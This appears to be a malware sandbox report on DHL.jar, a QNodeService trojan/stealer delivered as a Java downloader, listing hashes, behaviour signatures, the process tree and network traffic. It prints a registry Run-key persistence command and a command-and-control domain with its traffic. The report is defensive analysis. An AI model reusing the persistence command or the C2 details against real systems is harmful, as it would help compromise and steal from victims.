Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    146s
  • max time network
    128s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    12/10/2020, 06:16 UTC

General

  • Target

    DHL.jar

  • Size

    318KB

  • MD5

    ba3c3a491c1f542ba70b5cba78664c27

  • SHA1

    e3f3836cbd6c20799d5fd847852732ec6bbb64a6

  • SHA256

    f104ffa104dc5c0739ed98c605c0cc32fc148aa40dab5de2916d9b1f864a4654

  • SHA512

    7d0201320644db94497f6e1d0584a2be985210c205ae63a3ba4aaa7831d778aa5893e608ed96c082e31f4e63173ff626043cf90af93a2a747710366fa6745b50

Malware Config

Signatures

  • QNodeService

    Trojan/stealer written in NodeJS and spread via Java downloader.

  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • JavaScript code in executable 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\ProgramData\Oracle\Java\javapath\java.exe
    java -jar C:\Users\Admin\AppData\Local\Temp\DHL.jar
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3700
    • C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
      "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\7c354b6e.tmp
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1744
      • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
        C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain jahbless.hopto.org --hub-domain localhost
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:3848
        • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
          C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_vwXpV9\boot.js --hub-domain jahbless.hopto.org --hub-domain localhost
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2172
          • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
            C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_vwXpV9\boot.js --hub-domain jahbless.hopto.org --hub-domain localhost
            5⤵
            • Executes dropped EXE
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:968
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4150b6ef-79e8-4958-a0e7-711c10eeb34d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2972
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4150b6ef-79e8-4958-a0e7-711c10eeb34d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
                7⤵
                • Adds Run key to start application
                PID:1196

Network

  • flag-unknown
    DNS
    nodejs.org
    Remote address:
    8.8.8.8:53
    Request
    nodejs.org
    IN A
    Response
    nodejs.org
    IN A
    104.20.22.46
    nodejs.org
    IN A
    104.20.23.46
  • flag-unknown
    DNS
    jahbless.hopto.org
    Remote address:
    8.8.8.8:53
    Request
    jahbless.hopto.org
    IN A
    Response
    jahbless.hopto.org
    IN A
    18.229.141.132
  • flag-unknown
    DNS
    wtfismyip.com
    Remote address:
    8.8.8.8:53
    Request
    wtfismyip.com
    IN A
    Response
    wtfismyip.com
    IN A
    95.217.228.176
  • 104.20.22.46:443
    nodejs.org
    tls
    javaw.exe
    458.0kB
    29.6MB
    9943
    19808
  • 18.229.141.132:443
    jahbless.hopto.org
    tls
    node.exe
    865 B
    3.1kB
    7
    6
  • 18.229.141.132:443
    jahbless.hopto.org
    tls
    node.exe
    323.3kB
    13.7MB
    5708
    9143
  • 18.229.141.132:443
    jahbless.hopto.org
    tls
    node.exe
    865 B
    3.1kB
    7
    6
  • 18.229.141.132:443
    jahbless.hopto.org
    tls
    node.exe
    2.9kB
    3.8kB
    20
    14
  • 95.217.228.176:443
    wtfismyip.com
    tls
    node.exe
    895 B
    3.9kB
    8
    10
  • 127.0.0.1:443
    node.exe
  • 127.0.0.1:443
    node.exe
  • 127.0.0.1:443
    node.exe
  • 127.0.0.1:443
    node.exe
  • 127.0.0.1:443
    node.exe
  • 127.0.0.1:443
    node.exe
  • 127.0.0.1:443
    node.exe
  • 127.0.0.1:443
    node.exe
  • 127.0.0.1:443
    node.exe
  • 127.0.0.1:443
    node.exe
  • 127.0.0.1:443
    node.exe
  • 127.0.0.1:443
    node.exe
  • 127.0.0.1:443
    node.exe
  • 127.0.0.1:443
    node.exe
  • 127.0.0.1:443
    node.exe
  • 127.0.0.1:443
    node.exe
  • 127.0.0.1:443
    node.exe
  • 127.0.0.1:443
    node.exe
  • 127.0.0.1:443
    node.exe
  • 127.0.0.1:443
    node.exe
  • 127.0.0.1:443
    node.exe
  • 8.8.8.8:53
    nodejs.org
    dns
    56 B
    88 B
    1
    1

    DNS Request

    nodejs.org

    DNS Response

    104.20.22.46
    104.20.23.46

  • 8.8.8.8:53
    jahbless.hopto.org
    dns
    64 B
    80 B
    1
    1

    DNS Request

    jahbless.hopto.org

    DNS Response

    18.229.141.132

  • 8.8.8.8:53
    wtfismyip.com
    dns
    59 B
    75 B
    1
    1

    DNS Request

    wtfismyip.com

    DNS Response

    95.217.228.176

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/968-177-0x000000E6BE4C0000-0x000000E6BE4C1000-memory.dmp

    Filesize

    4KB

  • memory/2172-173-0x000001F93B900000-0x000001F93B901000-memory.dmp

    Filesize

    4KB

  • memory/3848-170-0x000001F018240000-0x000001F018241000-memory.dmp

    Filesize

    4KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.